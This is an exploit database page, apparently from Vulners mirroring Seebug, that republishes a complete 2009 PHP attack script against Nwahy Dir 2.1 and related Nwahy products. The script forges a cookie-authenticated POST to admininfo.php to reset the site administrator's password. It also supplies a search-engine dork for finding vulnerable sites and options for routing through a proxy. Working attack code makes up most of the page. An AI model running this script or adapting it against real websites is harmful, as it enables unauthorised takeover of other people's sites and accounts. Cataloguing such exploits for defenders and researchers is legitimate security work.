Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit

🗓️ 09 Jul 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 20 Views

“Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit. The exploit allows an attacker to change the admin password on Nwahy Dir v2.1 by injecting malicious code. The vulnerability is located in the admininfo.php file. The exploit can work on Nwahy Articles v1, Nwahy scripts v1, and Nwahy book v1. Usage of the exploit involves specifying the target server and the path to Nwahy Dir.

Code

                                                <?

	/*

			[ Nwahy Dir v2.1 Change Admin Password Exploit ]         
			
		[-] Author        : rEcruit
		[-] Mail            : recru1t[@]ymail.com
		[-] Download   : http://nwahy.com/showdownload-3105.html
		
		[-] Vuln in  ./admincp/admininfo.php
		
			[code]
			
			$u = addslashes($_COOKIE['username']);
			$query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
			$counts = mysql_num_rows($query);
			if($counts == 0){
			echo "<div align='center'>......................</div>";
			}else{
				
			[/code]
			
		[-] Works On :
		
			1. Nwahy Articles v1
				
			2. Nwahy scripts v1

			3. Nwahy book v1
			
		[-] Note : Path to Control Panel   "/admincp/" .

	*/

	error_reporting(0);
	ini_set("max_execution_time",0);
	ini_set("default_socket_timeout",5);


	function Usage()
	{
			print "\n\n";
			print "/------------------------------------------------------------\\\n";
			print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
			print "\------------------------------------------------------------/\n";
			print "| [-] Author : rEcruit                                       |\n";
			print "| [-] Mail   : [email protected]                             |\n";
			print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
			print "\------------------------------------------------------------/\n";
			print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
			print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
			print "| [-] HOST     : Target server (ip/hostname)                 |\n";
			print "| [-] PATH     : Path to Nwahy Dir                           |\n";
			print "| [-] Options  :                                             |\n";
			print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
			print "\------------------------------------------------------------/\n";
			print "\n\n";

		exit;
	}


	function Send()
	{
		Global $host,$path,$user,$pwd,$proxy;
		
		if(empty($proxy))
		{
			$Connect	= @fsockopen($host,"80") or die("[-] Bad Host .");
		}else{
			$proxy		= explode(":",$proxy);
			$Connect	= @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
		}
		
			$Payload	= "username={$user}&password={$pwd}";
			$Packet		.= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
			$Packet		.= "Host: {$host}\r\n";
			$Packet		.= "Cookie: username={$user}\r\n";
			$Packet		.= "X-Forwarded-For: 127.0.0.1\r\n";
			$Packet		.= "Content-Type: application/x-www-form-urlencoded\r\n";
			$Packet		.= "Content-Length: ".(strlen($Payload))."\r\n";
			$Packet		.= "Connection: close\r\n\r\n";
			$Packet		.= $Payload;

				fputs($Connect,$Packet);

				while(!feof($Connect)) 
				$Response	.= @fgets($Connect,2048);

				fclose($Connect);
		
		return $Response;
	}
	
	
	function Login()
	{
		$Response	= @Send();

			if(eregi("refresh",$Response))
			{
				$msg	= "[-] Password changed .\n";
			}
			elseif(eregi("<div align='center'>",$Response))
			{
				$msg	= "[-] Bad username .\n";
			}
			else
			{
				$msg	= "[-] Exploit failed .\n";
			}

		return $msg;
	}



	if ($argc < 3) Usage();

	$host	= $argv[1];
	$path	= $argv[2];;
	$proxy	= $argv[3];

	
		Print "\r\n[-] Connecting to {$host} .... \r\n";
		
		while(1)
		{
			Print "[-] Username: ";

			if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
			{
				Print "[-] New password: ";

				if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
				{
					Print Login();
					exit;
				}


			}


		} //end while

?>

# sebug.net

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jul 2009 00:00Current
7.1High risk
Vulners AI Score7.1
nwahy dir 2.1; arbitrary change; admin password; exploit; vulnerability; admininfo.php; nwahy articles v1; nwahy scripts v1; nwahy book v1; injection; malicious code; security exploit.
20